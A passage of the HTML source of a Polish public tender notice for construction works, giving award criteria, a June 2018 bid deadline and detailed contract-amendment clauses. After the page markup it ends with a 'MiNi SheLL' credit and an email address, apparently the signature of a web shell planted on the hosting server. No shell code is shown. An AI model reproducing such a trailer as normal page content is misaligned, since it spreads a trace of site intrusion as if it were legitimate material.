id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena ofertowa brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja jakości i rękojmia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">a) Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy, zostały zamieszczone wprojekcie umowy, stanowiącym Załącznik nr 2 do SIWZ. b) Zakazuje się zmian postanowień zawartejumowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, chyba żezachodzi co najmniej jedna z okoliczności przewidzianych w art. 144 ustawy Pzp. c) W związku zpowyższym na podstawie art. 144 ust. 1 pkt 1) ustawy Pzp zamawiający przewiduje możliwośćwprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty w okolicznościach iwarunkach szczegółowo określonych w §10, §10' oraz §25 projektu umowy (Załącznik nr 2 do SIWZ): §10 projektu umowy: 1. Strony ustalają, że uzgodnione wynagrodzenie ryczałtowe może ulec obniżeniu wprzypadku konieczności: a) ograniczenia przez Zamawiającego zakresu rzeczowego robót, b) odstąpieniaod umowy. 2. W przypadku zaistnienia sytuacji wymienionych w ust. 1, podstawą do wyliczenia kwotyobniżenia wynagrodzenia ryczałtowego będzie faktycznie niewykonany i obustronnie uzgodniony zakresrobót, dokonany w oparciu o szczegółowy kosztorys (sposób wyliczenia ceny oferty), przedłożony przezWykonawcę przed zawarciem umowy, sprawdzony przez Inspektora nadzoru inwestorskiego izatwierdzony przez Zamawiającego. 3. Na żądanie zamawiającego wykonawca zobowiązany jestwykonać roboty zamienne (w stosunku do robót przewidzianych w projekcie). Rozliczenie ewentualnychrobót zamiennych nastąpi kosztorysem różnicowym, który stanowić będzie różnicę pomiędzyszczegółowym kosztorysem dla robót podstawowych, a kosztorysem robót zamiennych. Kosztorys robótzamiennych należy opracować w pierwszej kolejności na podstawie składników cenotwórczychzawartych w szczegółowym kosztorysie robót podstawowych, a w razie braku poszczególnych pozycjikosztorysowych - na podstawie aktualnego cennika SEKOCENBUD - Biuletyn Cen Regionalnych wBudownictwie - jak dla woj. małopolskiego, z uwzględnieniem cen na poziomie średnim. O koniecznościwykonania robót zamiennych zamawiający pisemnie powiadamia wykonawcę. Wykonawca w terminie 7dni od daty otrzymania tego pisma sporządza kosztorys różnicowy. Po sprawdzeniu przez inspektoranadzoru inwestorskiego kosztorysu różnicowego oraz po jego zatwierdzeniu przez zamawiającego stronydokonają zmiany wynagrodzenia. 4. Roboty zamienne mogą być także wykonane na wniosek wykonawcypo uprzednim uzgodnieniu z zamawiającym, według zasad określonych w ust. 3. 5. W szczególnieuzasadnionych przypadkach żądanie i zamówienie robót zamiennych będzie stanowiło dla wykonawcypodstawę o wystąpienie z żądaniem przedłużenia terminu realizacji robót. Liczba dni przedłużających termin realizacji zostanie każdorazowo uzgodniona z zamawiającym inspektorem nadzoru przedformalnoprawnym zamówieniem robót zamiennych. 6. Poza wypadkami przewidzianymi w niniejszejumowie, Wykonawca nie może żądać podwyższenia wynagrodzenia z jakiegokolwiek tytułu chociażby wczasie zawarcia umowy nie można było przewidzieć rozmiaru lub kosztów prac. Ryzyko zaniżenia wofercie ceny ryczałtowej, poprzez nieuwzględnienie podczas jej ustalania kosztów pracnieprzewidzianych, spoczywa wyłącznie na Wykonawcy. § 10' projektu umowy: 1. Strony zobowiązująsię dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 9 ust. 2umowy, w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następującychokoliczności: 1) zmiany stawki podatku od towarów i usług, 2) zmiany wysokości minimalnegowynagrodzenia ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za pracę, 3) zmianyzasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawkiskładki na ubezpieczenia społeczne lub zdrowotne - na zasadach i w sposób określony w ust. 2 - 12, jeżelizmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę. 2. Zmiana wysokościwynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa w ust. 1 pkt 1,będzie odnosić się wyłącznie do części przedmiotu umowy zrealizowanej, zgodnie z terminamiustalonymi umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów iusług oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawkipodatku od towarów i usług. 3. W przypadku zmiany, o której mowa w ust. 1 pkt 1, wartośćwynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawienowych przepisów. 4. Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o którejmowa w ust. 1 pkt 2 lub 3, będzie obejmować wyłącznie część wynagrodzenia należnego Wykonawcy, wodniesieniu do której nastąpiła zmiana wysokości kosztów wykonania umowy przez Wykonawcę wzwiązku z wejściem w życie przepisów odpowiednio zmieniających wysokość minimalnegowynagrodzenia za pracę lub dokonujących zmian w zakresie zasad podlegania ubezpieczeniomspołecznym lub ubezpieczeniu zdrowotnemu lub w zakresie wysokości stawki składki na ubezpieczeniaspołeczne lub zdrowotne. 5. W przypadku zmiany, o której mowa w ust. 1 pkt 2, wynagrodzenieWykonawcy ulegnie zmianie o kwotę odpowiadającą wzrostowi kosztu Wykonawcy w związku zezwiększeniem wysokości wynagrodzeń pracowników świadczących pracę do wysokości aktualnieobowiązującego minimalnego wynagrodzenia za pracę, z uwzględnieniem wszystkich obciążeńpublicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. Kwota odpowiadająca wzrostowikosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia pracowników świadczącychpracę, o której mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni pracebezpośrednio związane z realizacją przedmiotu umowy. 6. W przypadku zmiany, o której mowa w ust. 1pkt 3, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą zmianie kosztu Wykonawcy ponoszonego w związku z wypłatą wynagrodzenia pracownikom świadczącym pracę. Kwotaodpowiadająca zmianie kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzeniapracowników świadczących pracę, o których mowa w zdaniu poprzedzającym, odpowiadającejzakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu umowy. 7. Wcelu zawarcia aneksu, o którym mowa w ust. 1, każda ze Stron może wystąpić do drugiej Strony zwnioskiem o dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy, wraz z uzasadnieniemzawierającym w szczególności szczegółowe wyliczenie całkowitej kwoty, o jaką wynagrodzenieWykonawcy powinno ulec zmianie, oraz wskazaniem daty, od której nastąpiła bądź nastąpi zmianawysokości kosztów wykonania umowy uzasadniająca zmianę wysokości wynagrodzenia należnegoWykonawcy. 8. W przypadku zmian, o których mowa w ust. 1 pkt 2 lub pkt 3, jeżeli z wnioskiemwystępuje Wykonawca, jest on zobowiązany dołączyć do wniosku dokumenty, z których będzie wynikać,w jakim zakresie zmiany te mają wpływ na koszty wykonania umowy, w szczególności: 1) pisemnezestawienie wynagrodzeń (zarówno przed jak i po zmianie) pracowników świadczących pracę, wraz zokreśleniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacjąprzedmiotu umowy oraz części wynagrodzenia odpowiadającej temu zakresowi - w przypadku zmiany, októrej mowa w ust. 1 pkt 2, lub 2) pisemne zestawienie wynagrodzeń (zarówno przed jak i po zmianie)pracowników świadczących pracę, wraz z kwotami składek uiszczanych do Zakładu UbezpieczeńSpołecznych/Kasy Rolniczego Ubezpieczenia Społecznego w części finansowanej przez Wykonawcę, zokreśleniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacjąprzedmiotu umowy oraz części wynagrodzenia odpowiadającej temu zakresowi - w przypadku zmiany, októrej mowa w ust. 1 pkt 3. 9. W przypadku zmiany, o której mowa w ust. 1 pkt 3, jeżeli z wnioskiemwystępuje Zamawiający, jest on uprawniony do zobowiązania Wykonawcy do przedstawienia wwyznaczonym terminie, nie krótszym niż 10 dni roboczych, dokumentów, z których będzie wynikać wjakim zakresie zmiana ta ma wpływ na koszty wykonania umowy, w tym pisemnego zestawieniawynagrodzeń, o którym mowa w ust. 8 pkt 2. 10. W terminie 10 dni roboczych od dnia przekazaniawniosku, o którym mowa w ust. 7, Strona, która otrzymała wniosek, przekaże drugiej Stronie informacjęo zakresie, w jakim zatwierdza wniosek oraz wskaże kwotę, o którą wynagrodzenie należne Wykonawcypowinno ulec zmianie, albo informację o niezatwierdzeniu wniosku wraz z uzasadnieniem. 11. Wprzypadku otrzymania przez Stronę informacji o niezatwierdzeniu wniosku lub częściowymzatwierdzeniu wniosku, Strona ta może ponownie wystąpić z wnioskiem, o którym mowa w ust. 7. Wtakim przypadku przepisy ust. 8 - 10 oraz 12 stosuje się odpowiednio. 12. Zawarcie aneksu nastąpi niepóźniej niż w terminie 10 dni roboczych od dnia zatwierdzenia wniosku o dokonanie zmiany wysokościwynagrodzenia należnego Wykonawcy. § 25 projektu umowy: 1. Zamawiający zgodnie zpostanowieniami art. 144 ust. 1 pkt 1 ustawy Pzp przewiduje możliwość wprowadzenia istotnych zmian postanowień przedmiotowej umowy w stosunku do treści złożonej oferty w następującychokolicznościach i warunkach: 1) zmiana założeń lub warunków realizacji zamówienia w trakcieprowadzenia prac, niezależna od Wykonawcy, 2) konieczność wprowadzenia zmian w dokumentacjiprojektowej i/lub wykonania dodatkowego zakresu robót budowlanych z tym związanych wynikających zodmiennych od przyjętych w dokumentacji technicznej uwarunkowań geologicznych, 3) niekorzystne,odpowiednio udokumentowane warunki atmosferyczne uniemożliwiające prawidłowe zrealizowanieprzedmiotu zamówienia, lub inne okoliczności, mające znamiona działania siły wyższej, rozumiane jakospowodowane czynnikami zewnętrznymi, niemożliwymi do przewidzenia, 4) przedłużanie się proceduruzyskania przez Wykonawcę decyzji administracyjnych, uzgodnień branżowych, opinii, za które toprzedłużenie się Wykonawca nie ponosi odpowiedzialności, 5) zmiany technologii, użytych materiałów isprzętu w czasie wykonywania zamówienia w uzgodnieniu z Zamawiającym i dla niego korzystne wsytuacjach niezawinionych przez Wykonawcę; 6) zmiany zakresu robót powierzonych podwykonawcom,zmiany podwykonawców zaangażowanych za zgodą Zamawiającego - pod warunkiem, że zmiana wynikaz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy; 7) zmiany dotyczącezatrudnienia podwykonawców /w przypadku gdy Wykonawca oświadczył, iż wykona umowę osobiście,w zakresie zgodnym ze SIWZ/, 8) konieczność wprowadzenia zmian w dokumentacji projektowej, 9)zmiana terminu wykonania przedmiotu zamówienia w przypadku działań osób trzecichuniemożliwiających wykonanie robót, które to działania nie są konsekwencją winy którejkolwiek zestron, 10) opóźnienie w przekazaniu terenu budowy lub w przekazaniu dokumentów, do przekazaniaktórych zgodnie z obowiązującymi przepisami Zamawiający był zobowiązany, 11) wstrzymanie lubzawieszenie robót przez Zamawiającego, 12) zmiana Wykonawcy w przypadku wystąpienia sukcesjiuniwersalnej określonej przepisami obowiązującego prawa, 13) brak dostępu do miejsc, w którychprzewidziano prowadzenie prac z przyczyn niezależnych od Wykonawcy. 2. Termin realizacjizamówienia może zostać przedłużony stosownie do okresu zaistniałego opóźnienia w sytuacjachopisanych powyżej lub odpowiednio do konsekwencji zmiany założeń lub warunków realizacjizamówienia, niezależnej od Wykonawcy. 3. Termin realizacji zamówienia może zostać przedłużony wszczególnie uzasadnionych przypadkach na skutek żądania i zamówienia robót zamiennych (§ 10 ust. 3,4, 5). Liczba dni przedłużających termin realizacji zostanie każdorazowo uzgodniona z zamawiającymprzed formalnoprawnym zamówieniem robót zamiennych. 4. Zmiana technologii wykonania elementówrealizowanego przedmiotu zamówienia lub zmiana rozwiązań projektowych (i w przypadku, kiedy tezmiany spowodują istotne opóźnienie prac) - zmiana terminu realizacji zamówienia będzie możliwa wprzypadku wymuszenia konieczności dokonania takiej zmiany poprzez np. stanowisko jednostekuzgadniających, opiniujących i inne ujawnione w toku prac okoliczności, które mają wpływ na przyjętezałożenia w dokumentacji projektowej i specyfikacjach technicznych, a których nie można było przewidzieć na etapie opracowania opisu przedmiotu zamówienia i złożenia oferty. 5. Zamawiającyzgodnie z § 10 niniejszej umowy przewiduje możliwość zmiany wynagrodzenia, o którym mowa w § 9ust. 2 umowy związanej z koniecznością rezygnacji przez Zamawiającego z wykonania częścizamówienia o wartości wynikającej z kosztorysu, o którym mowa w § 10 ust. 2 niniejszej umowy oraz wpkt 24 ppkt 2 SIWZ, stanowiącej Załącznik nr 1 do umowy. 6. Zmiana postanowień zawartej umowymoże nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-06-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferta powinna być sporządzona w języku polskim.</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com